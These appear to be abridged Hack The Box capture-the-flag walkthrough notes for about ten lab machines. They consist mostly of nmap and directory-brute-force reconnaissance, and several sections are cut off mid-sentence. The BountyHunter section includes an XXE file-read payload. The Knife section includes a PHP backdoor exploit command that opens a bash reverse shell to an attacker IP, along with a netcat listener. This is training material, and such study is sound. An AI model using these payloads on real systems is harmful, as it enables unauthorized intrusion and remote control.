HTB BountyHunter

$ nmap -A 10.10.11.100 -T4 -v

Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

http://10.10.11.100/
http://10.10.11.100/resources/README.txt
http://10.10.11.100/portal.php
http://10.10.11.100/log_submit.php

As we can observe in Burp, the submitted data is URL-encoded base64. It is XML data, so we could try an XXE. Using CyberChef (https://gchq.github.io) together with https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe we also find:

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file_to_use"> ]>

We can use it to check other files

HTB Love

$ nmap -A -p- 10.10.10.239 -T4

Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
    ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd

HTB Knife

$ nmap 10.10.10.242
$ nmap 10.10.10.242 -p- -v

http://10.10.10.242/

$ whatweb 10.10.10.242
$ searchsploit php 8.1.0-dev
$ searchsploit -m php/webapps/49933.py
$ python3 49933.py
$ id

Using this exploit we get a reverse shell, but it is not very useful, so we can try to get a better one: https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html

$ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1'"
$ sudo nc -lvnp 4444

james@knife:/$ ls
james@knife:/$ cd /home
james@knife:/home$ ls
james@knife:/home$

HTB Cap

$ nmap -A -p- 10.10.10.245 -T4 -Pn

Open ports:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn

http://10.10.10.245/

Site menu: Dashboard, Security Snapshot, IP Config, Network status

Security Snapshot: http://10.10.10.245/data/1

Using Burp we can crawl the site and check whether there is anything else under the data content. Using the Burp Discover functionality we can also find out if

HTB Explore

RustScan is a fast port scanner that promises to scan all 65k ports in 3 seconds. We can use it to perform a full port scan and then feed the results into Nmap. https://github.com/RustScan/RustScan

$ rustscan -a 10.10.10.247
$ sudo nmap -sV -sC 10.10.10.247 -p 2222,42135,42507,59777

In the port scan, we found several open ports. As usual, the ssh port is not a common place to start testing, so

HTB Scriptkiddie

$ nmap -A -p- 10.10.10.226 -T4

Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)

Accessing http://10.10.10.226:5000/

On this site we can observe that nmap and msfvenom are used.

$ searchsploit msfvenom

For nmap we don't get much from searchsploit, but for msfvenom we get exactly 1 result, so it is worth trying.

msf6 > search venom

HTB Delivery

Add the box to the hosts file.

$ sudo nano /etc/hosts
$ nmap delivery.htb -A -p- -T4

Open ports:

Site inspection:
http://delivery.htb
http://delivery.htb/#contact-us
http://helpdesk.delivery.htb/index.php
http://delivery.htb:8065

As you can create a user on the Mattermost server, we can start here: http://delivery.htb:8065/should_verify_email?email=user%40rffuste.com

We should verify the email, but no email is going to be received, so we need to find another way. If we focus on the Helpdesk site, http://helpdesk.delivery.htb/index.php, we can create a

HTB Academy

$ sudo nano /etc/hosts
$ nmap academy.htb -A -p- -T4

Open ports:
22/tcp - ssh
80/tcp - http
33060/tcp - mysql

Access http://academy.htb

$ python ~/tools/dirsearch/dirsearch.py -u http://academy.htb

http://academy.htb/admin.php
http://academy.htb/register.php

After this step, we would be able to log in to the site. Inspecting the registration request in Burp Suite when we register our user, we can observe: What would happen if we change this value when creating a new user? Modify

HTB Heist

$ nmap -sC -sV -oA all -vv -p- 10.10.10.149
$ gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e
$ gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php

Accessing http://10.10.10.149/login.php there is a "Login as Guest" option.

http://10.10.10.149/issues.php has an "Attachment" link: http://10.10.10.149/attachments/config.txt

The message talks about a Cisco router. Hazard asked for a user account to be created for him, so "hazard" should be a username. Testing the admin credentials we've just found. We need an

HTB Traceback

$ nmap -A -T4 -p- 10.10.10.181

Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.29

Access http://10.10.10.181

Can we assume that there is a web shell on this box? Let's try to find out.

$ gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

With our usual wordlist there are no interesting results. Let's try a different one, taking into account the comment on the main site that talked about web shells...

$ gobuster dir